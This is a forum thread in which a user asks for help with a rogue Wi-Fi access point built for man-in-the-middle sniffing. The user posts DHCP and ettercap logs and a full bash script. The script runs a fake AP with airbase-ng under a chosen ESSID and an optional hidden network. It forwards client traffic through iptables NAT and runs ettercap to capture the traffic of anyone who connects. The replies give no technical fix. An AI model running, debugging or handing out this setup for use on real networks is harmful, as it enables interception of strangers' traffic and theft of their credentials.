Results 1 to 7 of 7

Thread: Need help with Rogue AP

  1. #1
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default Need help with Rogue AP

    I'm trying to set up a rogue AP as described in this thread: hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've been trying different things all day and just can't get it to work. I'm using an Alfa card for AP and my laptop's built in wifi card for internet connection and I've tried both in VMware and a harddisk install of BT3. I am able to connect to the AP from my client computer but can't access the internet. I understand most of the script pretty well except the iptables stuff. I've already tried everything in the thread including setting the MTU to 1500, trying without starting up ettercap and manually inputting the commands one by one.. nothing seems to help.. Anyone have any ideas ?

  2. #2
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default Need help with Rogue AP

    I'm trying to make a rogue ap for mitm sniffing as described in this thread:
    hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've tried everything in the thread and then some but I'm not able to get on the internet from my client PC. I use an Alfa card for the AP and my laptop's built in wifi for internet connection. For backtrack I've tried from VMware and from a harddrive install it made no difference... I also tried both 1400 and 1500 for the MTU values. I've been at it all day but right now I have no more ideas so any help is appreciated...

  3. #3
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by che4in View Post
    I'm trying to set up a rogue AP as described in this thread: hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've been trying different things all day and just can't get it to work. I'm using an Alfa card for AP and my laptop's built in wifi card for internet connection and I've tried both in VMware and a harddisk install of BT3. I am able to connect to the AP from my client computer but can't access the internet. I understand most of the script pretty well except the iptables stuff. I've already tried everything in the thread including setting the MTU to 1500, trying without starting up ettercap and manually inputting the commands one by one.. nothing seems to help.. Anyone have any ideas ?
    I have one. Not creating two identical threads....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  4. #4
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default

    Quote Originally Posted by ShadowKill View Post
    I have one. Not creating two identical threads....
    heh I didn't see the thing about it not being posted until a mod reads it

  5. #5
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by che4in View Post
    I'm trying to make a rogue ap for mitm sniffing as described in this thread:
    hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've tried everything in the thread and then some but I'm not able to get on the internet from my client PC. I use an Alfa card for the AP and my laptop's built in wifi for internet connection. For backtrack I've tried from VMware and from a harddrive install it made no difference... I also tried both 1400 and 1500 for the MTU values. I've been at it all day but right now I have no more ideas so any help is appreciated...
    This attack is rather involved and there are numerous errors one can easily make. At this point you provide do not provide us with much information about your setup, apart from the fact that you are following this specific tutorial.

    I would suggest that you start with carefully reading through the whole thread and other similar threads, unless you have already done so. If you are not able to pinpoint the source of the problem by yourself after this provide us with all the commands you use along with detailed information about your network setup.
    -Monkeys are like nature's humans.

  6. #6
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default

    I have read the whole thread more than once and tried to look up any other info I could before I posted So far I have made an AP (with AWUS036H) and have DCHPD and Ettercap running (I've also tried without ettercap). I can connect with my client (Vista) but cannot access the internet... here is my net info and some logs that might help:


    Network info:
    lo no wireless extensions.

    eth0 no wireless extensions.

    eth1 IEEE 802.11b/g ESSID:"INDIANA" Nickname:"Broadcom 4318"
    Mode:Managed Frequency=2.462 GHz Access Point: 00:1B:2F:01:E2:B2
    Bit Rate=24 Mb/s Tx-Power=18 dBm
    RTS thrff Fragment thrff
    Encryption key:C79A-4F59-AE Security modepen
    Link Quality=75/100 Signal level=-41 dBm Noise level=-70 dBm
    Rx invalid nwid:0 Rx invalid crypt:1 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    wlan0 802.11b/g Mode:Monitor Channel=11 Bit Rate=11 Mb/s
    Tx-Power=5 dBm
    Retryn Fragment thrff
    Link Quality=96/100 Signal level=-156 dBm Noise level=-252 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    at0 no wireless extensions.
    DHCPD log:
    Code:
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:11:22:33:44:55/10.0.0/24
    Sending on   LPF/at0/00:11:22:33:44:55/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPDISCOVER from 00:13:e8:50:59:45 via at0
    DHCPOFFER on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    continued.....

  7. #7
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default

    Ettercap log:
    Code:
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on at0... (Ethernet)
    
       at0 ->       00:11:22:33:44:55          10.0.0.1     255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    
    0 hosts added to the hosts list...
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    I have tried both the original script and a modified script I made to suit my needs as well as inputting the commands one by one manually here is my modified script:
    Code:
    #!/bin/bash
    echo -n "ESSID:  "
    read -e  ESSID
    echo -n "AP CHANNEL:  "
    read -e CHAN
    echo -n "AP MAC:  "
    read -e APMAC
    echo -n "OTHER OPTIONS: [-z (type) WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 ] 
                  [-Z (type) WPA2 tags  1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 ]
                  [-X Hidden ESSID                                            ]"
    read -e OTHEROPT
    
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap dhcpcd
    airmon-ng stop wlan0
    ifconfig wlan0 down
    airmon-ng start wlan0
    sleep 15
    
    modprobe tun 
    konsole -e airbase-ng -e "$ESSID" -P -C 30 -v -c $CHAN -a $APMAC $OTHEROPT wlan0 &
    sleep 10
    
    
    
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 
    ifconfig at0 mtu 1500
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
    
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -u -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Also from the client PC I am able to ping 10.0.0.254 but nothing else... let me know if you have any ideas or what other info I can give you...
    Thanks in advance

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •